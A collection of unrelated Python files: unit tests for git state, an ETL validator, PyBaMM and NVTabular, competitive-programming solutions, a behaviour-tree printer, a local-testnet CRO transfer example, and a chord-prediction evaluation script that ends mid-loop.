'New branch \'develop\' was checked out, with origin/develop '
r'\([0-9a-f]{7}\) as a starting point'
)
# Only the revision should be in the changes dict.
self.assertEqual(
list(ret[next(iter(ret))]['changes'].keys()),
['revision']
)
# Since the remote repo was incorrectly set up, the local head should
# not exist (therefore the old revision should be None).
self.assertEqual(
ret[next(iter(ret))]['changes']['revision']['old'],
None
)
# Make sure the new revision is a SHA (40 chars, all hex)
self.assertTrue(
len(ret[next(iter(ret))]['changes']['revision']['new']) == 40)
self.assertTrue(
all([x in string.hexdigits for x in
ret[next(iter(ret))]['changes']['revision']['new']])
)
|
from sqlalchemy.sql import sqltypes
from georef_ar_etl.utils import ValidateTableSizeStep
from georef_ar_etl.exceptions import ProcessException
from . import ETLTestCase
class TestValidateTableSizeStep(ETLTestCase):
def test_eq(self):
"""El validador debería retornar la tabla de entrada si su tamaño es el
correcto."""
t1 = self.create_table('t1', {
'id': sqltypes.INTEGER
}, pkey='id')
self._ctx.session.add(t1(id=1))
step = ValidateTableSizeStep(target_size=1)
result = step.run(t1, self._ctx)
self.assertTrue(result is t1)
def test_eq_error(self):
"""El validador debería lanzar una excepción si el tamaño no es el
esperado, cuando se utiliza el operator 'eq'."""
t1 = self.create_table('t1', {
'id': sqltypes.INTEGER
}, pkey='id')
self._ctx.session.add(t1(id=1))
step = ValidateTableSizeStep(target_size=2)
with self.assertRaises(ProcessException):
step.run(t1, self._ctx)
def test_size_greater_equal_than(self):
"""El validador debería retornar la tabla de entrada si su tamaño es
mayor o igual al tamaño objetivo, cuando se utiliza el operador
'ge'."""
t1 = self.create_table('t1', {
'id': sqltypes.INTEGER
}, pkey='id')
for i in range(10):
self._ctx.session.add(t1(id=i))
step = ValidateTableSizeStep(target_size=5, op='ge')
result = step.run(t1, self._ctx)
self.assertTrue(result is t1)
def test_size_greater_equal_than_error(self):
"""El validador debería lanzar una excepción si su tamaño es menor al
tamaño objetivo, cuando se utiliza el operador 'ge'."""
t1 = self.create_table('t1', {
'id': sqltypes.INTEGER
}, pkey='id')
for i in range(10):
self._ctx.session.add(t1(id=i))
step = ValidateTableSizeStep(target_size=11, op='ge')
with self.assertRaises(ProcessException):
step.run(t1, self._ctx)
|
# -*- coding: utf-8 -*-
# @Time : 2022/02/10 16:39:46
# @Author : ddvv
# @Site : https://ddvvmmzz.github.io
# @File : json2tree.py
# @Software : Visual Studio Code
# @WeChat : NextB
from io import StringIO
_branch_extend = '│ '
_branch_mid = '├─ '
_branch_last = '└─ '
_spacing = ' '
lang_map = {
'process': '启动',
'behavior': '操作',
'drop': '释放',
'net': '连接'
}
def _getHierarchy(graph, name='', file=None, _prefix='', _last=True):
""" Recursively parse json data to print data types """
if isinstance(graph, dict):
op_type = graph.get('type', '')
if op_type:
name = lang_map.get(op_type, op_type) + ' ' + graph.get('name')
print(_prefix, _branch_last if _last else _branch_mid, \
name, sep="", file=file)
_prefix += _spacing if _last else _branch_extend
length = len(graph)
for i, key in enumerate(graph.keys()):
_last = i == (length - 1)
_getHierarchy(graph[key], '"' + key + '"', file, _prefix, _last)
elif isinstance(graph, list):
for each_json in graph:
_getHierarchy(each_json, '', file, _prefix, _last=True)
else:
pass
def graph2tree(graph):
messageFile = StringIO()
_getHierarchy(graph, file=messageFile)
message = messageFile.getvalue()
messageFile.close()
return message
|
#
# Tests for LG M50 parameter set loads
#
import pybamm
import unittest
class TestChen(unittest.TestCase):
def test_load_params(self):
anode = pybamm.ParameterValues({}).read_parameters_csv(
pybamm.get_parameters_filepath(
"input/parameters/lithium-ion/anodes/graphite_Chen2020/parameters.csv"
)
)
self.assertEqual(anode["Negative electrode porosity"], "0.25")
cathode = pybamm.ParameterValues({}).read_parameters_csv(
pybamm.get_parameters_filepath(
"input/parameters/lithium-ion/cathodes/nmc_Chen2020/parameters.csv"
)
)
self.assertEqual(cathode["Positive electrode porosity"], "0.335")
electrolyte = pybamm.ParameterValues({}).read_parameters_csv(
pybamm.get_parameters_filepath(
"input/parameters/lithium-ion/electrolytes/lipf6_Nyman2008/"
+ "parameters.csv"
)
)
self.assertEqual(electrolyte["Cation transference number"], "0.2594")
cell = pybamm.ParameterValues({}).read_parameters_csv(
pybamm.get_parameters_filepath(
"input/parameters/lithium-ion/cells/LGM50_Chen2020/parameters.csv"
)
)
self.assertAlmostEqual(cell["Negative current collector thickness [m]"], 12e-6)
def test_standard_lithium_parameters(self):
chemistry = pybamm.parameter_sets.Chen2020
parameter_values = pybamm.ParameterValues(chemistry=chemistry)
model = pybamm.lithium_ion.DFN()
sim = pybamm.Simulation(model, parameter_values=parameter_values)
sim.set_parameters()
sim.build()
if __name__ == "__main__":
print("Add -v for more debug output")
import sys
if "-v" in sys.argv:
debug = True
pybamm.settings.debug_mode = True
unittest.main()
|
# By manish.17, contest: ITMO Academy. Дерево отрезков часть 1. 1, problem: (A) Segment Tree for the Sum
# https://codeforces.com/profile/manish.17
from math import inf, log2
class SegmentTree:
def __init__(self, array, func=max):
self.n = len(array)
self.size = 2**(int(log2(self.n-1))+1) if self.n != 1 else 1
self.func = func
self.default = 0 if self.func != min else inf
self.data = [self.default] * (2 * self.size)
self.process(array)
def process(self, array):
self.data[self.size : self.size+self.n] = array
for i in range(self.size-1, -1, -1):
self.data[i] = self.func(self.data[2*i], self.data[2*i+1])
def query(self, alpha, omega):
"""Returns the result of function over the range (inclusive)!"""
if alpha == omega:
return self.data[alpha + self.size]
res = self.default
alpha += self.size
omega += self.size + 1
while alpha < omega:
if alpha & 1:
res = self.func(res, self.data[alpha])
alpha += 1
if omega & 1:
omega -= 1
res = self.func(res, self.data[omega])
alpha >>= 1
omega >>= 1
return res
def update(self, index, value):
"""Updates the element at index to given value!"""
index += self.size
self.data[index] = value
index >>= 1
while index:
self.data[index] = self.func(self.data[2*index], self.data[2*index+1])
index >>= 1
# ------------------- fast io --------------------
import os
import sys
from io import BytesIO, IOBase
BUFSIZE = 8192
class FastIO(IOBase):
newlines = 0
def __init__(self, file):
self._fd = file.fileno()
self.buffer = BytesIO()
self.writable = "x" in file.mode or "r" not in file.mode
self.write = self.buffer.write if self.writable else None
def read(self):
while True:
b = os.read(self._fd, max(os.fstat(self._fd).st_size, BUFSIZE))
if not b:
break
ptr = self.buffer.tell()
self.buffer.seek(0, 2), self.buffer.write(b), self.buffer.seek(ptr)
self.newlines = 0
return self.buffer.read()
def readline(self):
while self.newlines == 0:
b = os.read(self._fd, max(os.fstat(self._fd).st_size, BUFSIZE))
self.newlines = b.count(b"\n") + (not b)
ptr = self.buffer.tell()
self.buffer.seek(0, 2), self.buffer.write(b), self.buffer.seek(ptr)
self.newlines -= 1
return self.buffer.readline()
def flush(self):
if self.writable:
os.write(self._fd, self.buffer.getvalue())
self.buffer.truncate(0), self.buffer.seek(0)
class IOWrapper(IOBase):
def __init__(self, file):
self.buffer = FastIO(file)
self.flush = self.buffer.flush
self.writable = self.buffer.writable
self.write = lambda s: self.buffer.write(s.encode("ascii"))
self.read = lambda: self.buffer.read().decode("ascii")
self.readline = lambda: self.buffer.readline().decode("ascii")
sys.stdin, sys.stdout = IOWrapper(sys.stdin), IOWrapper(sys.stdout)
input = lambda: sys.stdin.readline().rstrip("\r\n")
# ------------------- fast io --------------------
n, m = map(int, input().split())
a = list(map(int, input().split()))
st = SegmentTree(a, func=lambda a, b: a+b)
for i in range(m):
x, y, z = map(int, input().split())
if x == 1:
st.update(y,z)
else:
print(st.query(y,z-1))
|
# https://www.codewars.com/kata/517abf86da9663f1d2000003/train/python
# Complete the method/function so that it converts dash/underscore delimited
# words into camel casing. The first word within the output should be capitalized
# only if the original word was capitalized (known as Upper Camel Case, also
# often referred to as Pascal case).
# Examples
# to_camel_case("the-stealth-warrior") # returns "theStealthWarrior"
# to_camel_case("The_Stealth_Warrior") # returns "TheStealthWarrior"
def to_camel_case(text):
result = ""
temp = ''
tempList = []
for i in range(len(text)):
char = text[i]
if (char == '-' or char == '_'):
tempList.append(temp)
temp = ''
else:
temp += char
tempList.append(temp)
result += tempList[0]
for word in tempList[1:]:
result += word[0].upper() + word[1:]
return result
# Alternative:
# def to_camel_case(s):
# return s[0] + s.title().translate(None, "-_")[1:] if s else s
# Explanations:
# The title() method returns a copy of the string in which first characters of all the words are capitalized.
# The translate() method returns a copy of the string in which all characters have been translated using table (constructed with the maketrans() function in the string module), optionally deleting all characters found in the string deletechars.
|
#!/usr/bin/env python3
# -*- coding: utf-8 -*-
from chainlibpy import CROCoin, GrpcClient, Transaction, Wallet
from chainlibpy.generated.cosmos.bank.v1beta1.tx_pb2 import MsgSend
from chainlibpy.grpc_client import NetworkConfig
# Recommend to use [pystarport](https://pypi.org/project/pystarport/) to setup a testnet locally
# To use testnet configs in local_testnet_configs with pystarport:
# 1. Download corresponding chain-maind binary from https://github.com/crypto-org-chain/chain-main/releases # noqa: 501
# 2. Copy chain-maind binary to `./example` directory
# 3. Enter `poetry shell`
# 4. Go to `./example` directory
# 5. Run Command `pystarport serve --data=./data --config=./local_testnet_configs/default.yaml --cmd=./chain-maind` # noqa: 501
# 6. Obtain `MNEMONIC_PHRASE` and `TO_ADDRESS` accordingly
# 7. Open another terminal window and run examples in this file
# Obtained from {directory_started_pystarport}/data/chainmaind/accounts.json
# To recover one of the genesis account
MNEMONIC_PHRASE = "first ... last"
# Obtained from {directory_started_pystarport}/data/chainmaind/accounts.json
TO_ADDRESS = "cro...add"
LOCAL_NETWORK = NetworkConfig(
# grpc_endpoint from {directory_started_pystarport}/data/chaintest/nodex/config/app.toml
# Look for "gRPC Configuration" section
grpc_endpoint="0.0.0.0:26653",
# chain_id from from {directory_started_pystarport}/data/
# the directory name under data is the chain_id
chain_id="chaintest",
address_prefix="cro",
coin_denom="cro",
coin_base_denom="basecro",
exponent=8,
derivation_path="m/44'/394'/0'/0/0",
)
def simple_transaction():
client = GrpcClient(LOCAL_NETWORK)
sending_wallet = Wallet(
MNEMONIC_PHRASE, LOCAL_NETWORK.derivation_path, LOCAL_NETWORK.address_prefix
)
sending_account = client.query_account(sending_wallet.address)
sending_account_init_bal = client.query_account_balance(sending_wallet.address)
receiving_account_init_bal = client.query_account_balance(TO_ADDRESS)
print(
f"sending account initial balance: {sending_account_init_bal.balance.amount}"
f"{sending_account_init_bal.balance.denom}"
)
print(
f"receiving account initial balance: {receiving_account_init_bal.balance.amount}"
f"{receiving_account_init_bal.balance.denom}"
)
ten_cro = CROCoin("10", "cro", LOCAL_NETWORK)
one_cro_fee = CROCoin("1", "cro", LOCAL_NETWORK)
msg_send = MsgSend(
from_address=sending_wallet.address,
to_address=TO_ADDRESS,
amount=[ten_cro.protobuf_coin_message],
)
tx = Transaction(
chain_id=LOCAL_NETWORK.chain_id,
from_wallets=[sending_wallet],
msgs=[msg_send],
account_number=sending_account.account_number,
fee=[one_cro_fee.protobuf_coin_message],
client=client,
)
signature_alice = sending_wallet.sign(tx.sign_doc.SerializeToString())
signed_tx = tx.set_signatures(signature_alice).signed_tx
client.broadcast_transaction(signed_tx.SerializeToString())
sending_account_aft_bal = client.query_account_balance(sending_wallet.address)
receiving_account_aft_bal = client.query_account_balance(TO_ADDRESS)
print("After transaction of sending 10cro with a 1cro fee:")
print(
f"sending account after balance: {sending_account_aft_bal.balance.amount}"
f"{sending_account_aft_bal.balance.denom}"
)
print(
f"receiving account after balance: {receiving_account_aft_bal.balance.amount}"
f"{receiving_account_aft_bal.balance.denom}"
)
def transaction_with_two_messages():
client = GrpcClient(LOCAL_NETWORK)
sending_wallet = Wallet(
MNEMONIC_PHRASE, LOCAL_NETWORK.derivation_path, LOCAL_NETWORK.address_prefix
)
sending_account = client.query_account(sending_wallet.address)
sending_account_init_bal = client.query_account_balance(sending_wallet.address)
receiving_account_init_bal = client.query_account_balance(TO_ADDRESS)
print(
f"sending account initial balance : {sending_account_init_bal.balance.amount}"
f"{sending_account_init_bal.balance.denom}"
)
print(
f"receiving account initial balance: {receiving_account_init_bal.balance.amount}"
f"{receiving_account_init_bal.balance.denom}"
)
one_hundred_cro = CROCoin("100", "cro", LOCAL_NETWORK)
two_hundred_cro = CROCoin("200", "cro", LOCAL_NETWORK)
one_cro_fee = CROCoin("1", "cro", LOCAL_NETWORK)
msg_send_100_cro = MsgSend(
from_address=sending_wallet.address,
to_address=TO_ADDRESS,
amount=[one_hundred_cro.protobuf_coin_message],
)
msg_send_200_cro = MsgSend(
from_address=sending_wallet.address,
to_address=TO_ADDRESS,
amount=[two_hundred_cro.protobuf_coin_message],
)
tx = Transaction(
chain_id=LOCAL_NETWORK.chain_id,
from_wallets=[sending_wallet],
msgs=[msg_send_100_cro],
account_number=sending_account.account_number,
fee=[one_cro_fee.protobuf_coin_message],
client=client,
)
tx.append_message(msg_send_200_cro)
signature_alice = sending_wallet.sign(tx.sign_doc.SerializeToString())
signed_tx = tx.set_signatures(signature_alice).signed_tx
client.broadcast_transaction(signed_tx.SerializeToString())
sending_account_aft_bal = client.query_account_balance(sending_wallet.address)
receiving_account_aft_bal = client.query_account_balance(TO_ADDRESS)
sending_account_cro = CROCoin(
sending_account_aft_bal.balance.amount,
sending_account_aft_bal.balance.denom,
LOCAL_NETWORK,
)
receiving_account_cro = CROCoin(
receiving_account_aft_bal.balance.amount,
receiving_account_aft_bal.balance.denom,
LOCAL_NETWORK,
)
print("After transaction of sending 300cro in total with a 1cro fee:")
print(f"sending account after balance : {sending_account_cro.amount_with_unit}")
print(f"receiving account after balance: {receiving_account_cro.amount_with_unit}")
if __name__ == "__main__":
simple_transaction()
transaction_with_two_messages()
|
#
# Copyright (c) 2020, NVIDIA CORPORATION.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
import os
import shutil
import time
import cudf
import numba.cuda
import pytest
from cudf.tests.utils import assert_eq
import nvtabular as nvt
from nvtabular import ops as ops
from nvtabular.framework_utils.torch.models import Model
from nvtabular.framework_utils.torch.utils import process_epoch
from tests.conftest import mycols_csv, mycols_pq
# If pytorch isn't installed skip these tests. Note that the
# torch_dataloader import needs to happen after this line
torch = pytest.importorskip("torch")
import nvtabular.loader.torch as torch_dataloader # noqa isort:skip
GPU_DEVICE_IDS = [d.id for d in numba.cuda.gpus]
@pytest.mark.parametrize("batch", [0, 100, 1000])
@pytest.mark.parametrize("engine", ["csv", "csv-no-header"])
def test_gpu_file_iterator_ds(df, dataset, batch, engine):
df_itr = cudf.DataFrame()
for data_gd in dataset.to_iter(columns=mycols_csv):
df_itr = cudf.concat([df_itr, data_gd], axis=0) if df_itr else data_gd
assert_eq(df_itr.reset_index(drop=True), df.reset_index(drop=True))
@pytest.mark.parametrize("engine", ["parquet"])
@pytest.mark.parametrize("cat_names", [["name-cat", "name-string"], []])
@pytest.mark.parametrize("cont_names", [["x", "y", "id"], []])
@pytest.mark.parametrize("label_name", [["label"], []])
def test_empty_cols(tmpdir, df, dataset, engine, cat_names, cont_names, label_name):
features = []
if cont_names:
features.append(cont_names >> ops.FillMedian() >> ops.Normalize())
if cat_names:
features.append(cat_names >> ops.Categorify())
# test out https://github.com/NVIDIA/NVTabular/issues/149 making sure we can iterate over
# empty cats/conts
graph = sum(features, nvt.ColumnGroup(label_name))
if not graph.columns:
# if we don't have conts/cats/labels we're done
return
processor = nvt.Workflow(sum(features, nvt.ColumnGroup(label_name)))
output_train = os.path.join(tmpdir, "train/")
os.mkdir(output_train)
df_out = processor.fit_transform(dataset).to_ddf().compute(scheduler="synchronous")
data_itr = torch_dataloader.TorchAsyncItr(
nvt.Dataset(df_out), cats=cat_names, conts=cont_names, labels=label_name, batch_size=1
)
for nvt_batch in data_itr:
cats, conts, labels = nvt_batch
if cat_names:
assert cats.shape[-1] == len(cat_names)
if cont_names:
assert conts.shape[-1] == len(cont_names)
if label_name:
assert labels.shape[-1] == len(label_name)
@pytest.mark.parametrize("part_mem_fraction", [0.001, 0.06])
@pytest.mark.parametrize("batch_size", [1, 10, 100])
@pytest.mark.parametrize("engine", ["parquet"])
@pytest.mark.parametrize("devices", [None, GPU_DEVICE_IDS[:2]])
def test_gpu_dl(tmpdir, df, dataset, batch_size, part_mem_fraction, engine, devices):
cat_names = ["name-cat", "name-string"]
cont_names = ["x", "y", "id"]
label_name = ["label"]
conts = cont_names >> ops.FillMedian() >> ops.Normalize()
cats = cat_names >> ops.Categorify()
processor = nvt.Workflow(conts + cats + label_name)
output_train = os.path.join(tmpdir, "train/")
os.mkdir(output_train)
processor.fit_transform(dataset).to_parquet(
shuffle=nvt.io.Shuffle.PER_PARTITION,
output_path=output_train,
out_files_per_proc=2,
)
tar_paths = [
os.path.join(output_train, x) for x in os.listdir(output_train) if x.endswith("parquet")
]
nvt_data = nvt.Dataset(tar_paths[0], engine="parquet", part_mem_fraction=part_mem_fraction)
data_itr = torch_dataloader.TorchAsyncItr(
nvt_data,
batch_size=batch_size,
cats=cat_names,
conts=cont_names,
labels=["label"],
devices=devices,
)
columns = mycols_pq
df_test = cudf.read_parquet(tar_paths[0])[columns]
df_test.columns = [x for x in range(0, len(columns))]
num_rows, num_row_groups, col_names = cudf.io.read_parquet_metadata(tar_paths[0])
rows = 0
# works with iterator alone, needs to test inside torch dataloader
for idx, chunk in enumerate(data_itr):
if devices is None:
assert float(df_test.iloc[rows][0]) == float(chunk[0][0][0])
rows += len(chunk[0])
del chunk
# accounts for incomplete batches at the end of chunks
# that dont necesssarily have the full batch_size
assert rows == num_rows
def gen_col(batch):
batch = batch[0]
return batch[0], batch[1], batch[2]
t_dl = torch_dataloader.DLDataLoader(
data_itr, collate_fn=gen_col, pin_memory=False, num_workers=0
)
rows = 0
for idx, chunk in enumerate(t_dl):
if devices is None:
assert float(df_test.iloc[rows][0]) == float(chunk[0][0][0])
rows += len(chunk[0])
if os.path.exists(output_train):
shutil.rmtree(output_train)
@pytest.mark.parametrize("part_mem_fraction", [0.001, 0.1])
@pytest.mark.parametrize("engine", ["parquet"])
def test_kill_dl(tmpdir, df, dataset, part_mem_fraction, engine):
cat_names = ["name-cat", "name-string"]
cont_names = ["x", "y", "id"]
label_name = ["label"]
conts = cont_names >> ops.FillMedian() >> ops.Normalize()
cats = cat_names >> ops.Categorify()
processor = nvt.Workflow(conts + cats + label_name)
output_train = os.path.join(tmpdir, "train/")
os.mkdir(output_train)
processor.fit_transform(dataset).to_parquet(
shuffle=nvt.io.Shuffle.PER_PARTITION,
output_path=output_train,
out_files_per_proc=2,
)
tar_paths = [
os.path.join(output_train, x) for x in os.listdir(output_train) if x.endswith("parquet")
]
nvt_data = nvt.Dataset(tar_paths[0], engine="parquet", part_mem_fraction=part_mem_fraction)
data_itr = torch_dataloader.TorchAsyncItr(
nvt_data, cats=cat_names, conts=cont_names, labels=["label"]
)
results = {}
for batch_size in [2 ** i for i in range(9, 25, 1)]:
print("Checking batch size: ", batch_size)
num_iter = max(10 * 1000 * 1000 // batch_size, 100) # load 10e7 samples
# import pdb; pdb.set_trace()
data_itr.batch_size = batch_size
start = time.time()
for i, data in enumerate(data_itr):
if i >= num_iter:
break
del data
stop = time.time()
throughput = i * batch_size / (stop - start)
results[batch_size] = throughput
print(
"batch size: ",
batch_size,
", throughput: ",
throughput,
"items",
i * batch_size,
"time",
stop - start,
)
def test_mh_support(tmpdir):
df = cudf.DataFrame(
{
"Authors": [["User_A"], ["User_A", "User_E"], ["User_B", "User_C"], ["User_C"]],
"Reviewers": [["User_A"], ["User_A", "User_E"], ["User_B", "User_C"], ["User_C"]],
"Engaging User": ["User_B", "User_B", "User_A", "User_D"],
"Post": [1, 2, 3, 4],
}
)
cat_names = ["Authors", "Reviewers"] # , "Engaging User"]
cont_names = []
label_name = ["Post"]
cats = cat_names >> ops.HashBucket(num_buckets=10)
processor = nvt.Workflow(cats + label_name)
df_out = processor.fit_transform(nvt.Dataset(df)).to_ddf().compute(scheduler="synchronous")
# check to make sure that the same strings are hashed the same
authors = df_out["Authors"].to_arrow().to_pylist()
assert authors[0][0] == authors[1][0] # 'User_A'
assert authors[2][1] == authors[3][0] # 'User_C'
data_itr = torch_dataloader.TorchAsyncItr(
nvt.Dataset(df_out), cats=cat_names, conts=cont_names, labels=label_name
)
idx = 0
for batch in data_itr:
idx = idx + 1
cats, conts, labels = batch
cats, mh = cats
# mh is a tuple of dictionaries {Column name: (values, offsets)}
assert len(mh) == len(cat_names)
assert not cats
assert idx > 0
def test_mh_model_support(tmpdir):
df = cudf.DataFrame(
{
"Authors": [["User_A"], ["User_A", "User_E"], ["User_B", "User_C"], ["User_C"]],
"Reviewers": [["User_A"], ["User_A", "User_E"], ["User_B", "User_C"], ["User_C"]],
"Engaging User": ["User_B", "User_B", "User_A", "User_D"],
"Null User": ["User_B", "User_B", "User_A", "User_D"],
"Post": [1, 2, 3, 4],
"Cont1": [0.3, 0.4, 0.5, 0.6],
"Cont2": [0.3, 0.4, 0.5, 0.6],
"Cat1": ["A", "B", "A", "C"],
}
)
cat_names = ["Cat1", "Null User", "Authors", "Reviewers"] # , "Engaging User"]
cont_names = ["Cont1", "Cont2"]
label_name = ["Post"]
out_path = os.path.join(tmpdir, "train/")
os.mkdir(out_path)
cats = cat_names >> ops.Categorify()
conts = cont_names >> ops.Normalize()
processor = nvt.Workflow(cats + conts + label_name)
df_out = processor.fit_transform(nvt.Dataset(df)).to_ddf().compute()
data_itr = torch_dataloader.TorchAsyncItr(
nvt.Dataset(df_out),
cats=cat_names,
conts=cont_names,
labels=label_name,
batch_size=2,
)
emb_sizes = nvt.ops.get_embedding_sizes(processor)
EMBEDDING_DROPOUT_RATE = 0.04
DROPOUT_RATES = [0.001, 0.01]
HIDDEN_DIMS = [1000, 500]
LEARNING_RATE = 0.001
model = Model(
embedding_table_shapes=emb_sizes,
num_continuous=len(cont_names),
emb_dropout=EMBEDDING_DROPOUT_RATE,
layer_hidden_dims=HIDDEN_DIMS,
layer_dropout_rates=DROPOUT_RATES,
).cuda()
optimizer = torch.optim.Adam(model.parameters(), lr=LEARNING_RATE)
def rmspe_func(y_pred, y):
"Return y_pred and y to non-log space and compute RMSPE"
y_pred, y = torch.exp(y_pred) - 1, torch.exp(y) - 1
pct_var = (y_pred - y) / y
return (pct_var ** 2).mean().pow(0.5)
train_loss, y_pred, y = process_epoch(
data_itr,
model,
train=True,
optimizer=optimizer,
# transform=batch_transform,
amp=False,
)
train_rmspe = None
train_rmspe = rmspe_func(y_pred, y)
assert train_rmspe is not None
assert len(y_pred) > 0
assert len(y) > 0
|
#!/usr/bin/env python3
# -*- coding: utf-8 -*-
"""
Created on Fri Jun 7 11:51:53 2019
@author: carsault
"""
#%%
import pickle
import torch
from utilities import chordUtil
from utilities.chordUtil import *
from utilities import testFunc
from utilities.testFunc import *
from utilities import distance
from utilities.distance import *
from ACE_Analyzer import ACEAnalyzer
from ACE_Analyzer.ACEAnalyzer import *
import numpy as np
import time
#time.sleep(3600)
# CUDA for PyTorch
device = torch.device("cuda" if torch.cuda.is_available() else "cpu")
dtype = torch.cuda.FloatTensor
foldName = "modelSave200908"
#modelType = ["mlpDecim", "mlpDecimKey", "mlpDecimBeat", "mlpDecimKeyBeat","mlpDecimAug","mlpDecimFamily"]
#modelType = ["lstmDecim"]
modelType = ["mlpDecimAug"]
randm = [1, 2, 3, 4, 5]
#alpha = ['functional']
alpha = ['a0','a2','a5','functional']
maxRepList = [1]
alphaRep = ["Nope","alphaRep"]
dictKey, listKey = chordUtil.getDictKey()
correctDown = [0]*4
correctPos = [0]*8
totalDown = [0]*4
totalPos = [0]*8
musicalDist2 = 0
musicalDist4 = 0
dictFinalRes = {}
specName = ""
#test
#modelType = ["mlpDecim"]
#foldName = "modelSave190515"
#randm = [1]
#alpha = ['a0']
#%%
def perplexityAccumulate(res, y, sPrev, nby ,one_hot = False):
s = 0
oneHot = []
if one_hot == True:
for i in range(len(y)):
oneHot.append(y[i].index(max(y[i])))
else:
oneHot = y
for r, t in zip(res,oneHot):
s += np.log2(r[t])
sPrev += s
nby += len(y)
return sPrev, nby
def perplexityCompute(s,y):
s /= -y
return 2 ** s
#%%
def perplexity(res, y, one_hot = False):
s = 0
oneHot = []
if one_hot == True:
for i in range(len(y)):
oneHot.append(y[i].index(max(y[i])))
else:
oneHot = y
for r, t in zip(res,oneHot):
s += np.log2(r[t])
s /= -len(y)
return 2 ** s
#%%
for alph in alpha:
for model in modelType:
if model == "mlpDecimFamily":
str1 = "124"
else:
str1 = "1"
for maxReps in maxRepList:
if maxReps == 1:
alphaRep = "Nope"
else:
alphaRep = "alphaRep"
#if maxReps == 1 or model == "mlpDecim" or model == "mlpDecimAug" or model == "lstmDecim":
if maxReps == 1 or model == "mlpDecim" or model == "mlpDecimAug":
print("\n------\n------\nResult for " + model + "on alphabet " + alph + "\n------\n------\n")
perp = []
rank = []
totRank = []
#Analyzer = ACEAnalyzer()
if alph != "functional":
dictChord, listChord = chordUtil.getDictChord(eval(alph))
distMat = testFunc.computeMat(dictChord, "euclidian")
#if alphaRep == "alphaRep":
# dictChord, listChord = chordUtil.getDictChordUpgrade(eval(alph), maxReps)
dictKeyChord = {}
dictKeyChordAll = {}
for key in dictKey:
dictKeyChord[key] = np.zeros(len(listChord))
dictKeyChordAll[key] = np.zeros(len(listChord))
Analyzer = ACEAnalyzer()
AnalyzerDiat = ACEAnalyzer()
AnalyzerNoDiat = ACEAnalyzer()
if alph == "a0":
dictFun = relatif
totAcc = []
totAccRepeat = []
totAccDiat = []
totAccNoDiat = []
totKey= []
totDownbeat = []
totAccFun = []
totAcca0 = []
totAccDiat = []
totAccNoDiat = []
totAccDownbeat = []
totAccPos = []
totAccBeatPos = []
totDist = []
predTotDist = []
totDistPred = []
totDist2a = []
totDist4a = []
totDist2b = []
totDist4b = []
totDist2c = []
totDist4c = []
nbCorrectChordDiat = 0
nbCorrectChordNoDiat = 0
nbTotalDiat = 0
nbTotalNoDiat = 0
for rand in randm:
'''
sumPred2ab = np.zeros(len(listChord))
sumTarg2ab = np.zeros(len(listChord))
sumPred4ab = np.zeros(len(listChord))
sumTarg4ab = np.zeros(len(listChord))
sumPred2c = np.zeros(len(listChord))
sumTarg2c = np.zeros(len(listChord))
sumPred4c = np.zeros(len(listChord))
sumTarg4c = np.zeros(len(listChord))
'''
correctDown = [0]*4
correctPos = [0]*8
totalDown = [0]*4
totalPos = [0]*8
correctBeatPos = np.zeros((4,8))
totalBeatPos = np.zeros((4,8))
accBeatPos = np.zeros((4,8))
musicalDist = 0
predMusicalDist = 0
acc2correct = 0
acc4correct = 0
musicalDist2a = 0
musicalDist4a = 0
musicalDist2b = 0
musicalDist4b = 0
musicalDist2c = 0
musicalDist4c = 0
#zerr = np.zeros(len(dictChord))
total = 0
totalRepeat = 0
totalDiat = 0
totalNoDiat = 0
acc = 0
accRepeat = 0
accDiat = 0
accNoDiat = 0
correct = 0
correctDiat = 0
correctNoDiat = 0
keycorrect = 0
downbeatcorrect = 0
correctReducFunc = 0
correctReduca0 = 0
#dataFolder = alph + "_1_" + str(rand)
if alphaRep == "alphaRep":
dataFolder = alph + "_1_" + str(rand) + "newRep" + str(maxReps)
else:
dataFolder = alph + "_124_" + str(rand)
#modelName = dataFolder + "_" + str1 + "_" + model + specName
if modelType == "mlpDecimFamily":
modelName = dataFolder + "_124_" + model + specName
else:
modelName = dataFolder + "_" + str1 + "_" + model + specName
#with open("testVector/" + foldName + '/' + modelName + '/' + "probVect_" + modelName + "_test.pkl", 'rb') as fp:
with open(foldName + '/' + modelName + '/' + "res" + modelName + ".pkl", 'rb') as fp:
dictDat = pickle.load(fp)
#dictDat["X"] = dictDat["X"].cpu().numpy()
#dictDat["y"] = dictDat["y"].cpu().numpy()
totKey.append(dictDat["bestAccurKeyTest"])
totAccDownbeat.append(dictDat["bestAccurBeatTest"])
'''
if alph != "functional":
#musicalDist = np.sum(np.matmul(dictDat["X"], distMat) * dictDat["y"])
musicalDist = 0
for i in range(len(dictDat["X"])):
pred = np.argmax(dictDat["X"][i])
tgt = np.argmax(dictDat["y"][i])
# rank of the chords
rank.append(len(np.where(dictDat["X"][i] > dictDat["X"][i][tgt])[0]) + 1)
total += 1
totalDown[dictDat["beat"][i]] += 1
totalPos[dictDat["pos"][i]] += 1
totalBeatPos[dictDat["beat"][i],dictDat["pos"][i]] += 1
# Accuracy:
if pred == tgt:
correct += 1
correctDown[dictDat["beat"][i]] += 1
correctPos[dictDat["pos"][i]] += 1
correctBeatPos[dictDat["beat"][i],dictDat["pos"][i]] += 1
#if alphaRep != "alphaRep":
# predMusicalDist += distMat[pred][tgt]
if alph != "functional":
predF = dictFun[reduChord(listChord[pred], alpha= 'a0', transp = 0)]
tgtF = dictFun[reduChord(listChord[tgt], alpha= 'a0', transp = 0)]
if predF == tgtF:
correctReducFunc +=1
if alph != "functional" and alph != "a0":
preda0 = reduChord(listChord[pred], alpha= 'a0', transp = 0)
tgta0 = reduChord(listChord[tgt], alpha= 'a0', transp = 0)
if preda0 == tgta0:
correctReduca0 +=1
if alph != "functional":
Analyzer.compare(chord = listChord[pred], target = listChord[tgt], key = listKey[dictDat["key"][i]], base_alpha = a5, print_comparison = False)
root_target, qual_target = parse_mir_label(listChord[tgt])
root_target = normalized_note(root_target)
root_target, qual_target = functional_tetrad(root_target, qual_target, listKey[dictDat["key"][i]], base_alpha = a5)
degree_target = degree(root_target, qual_target, listKey[dictDat["key"][i]])
if degree_target == "non-diatonic":
nbTotalNoDiat += 1
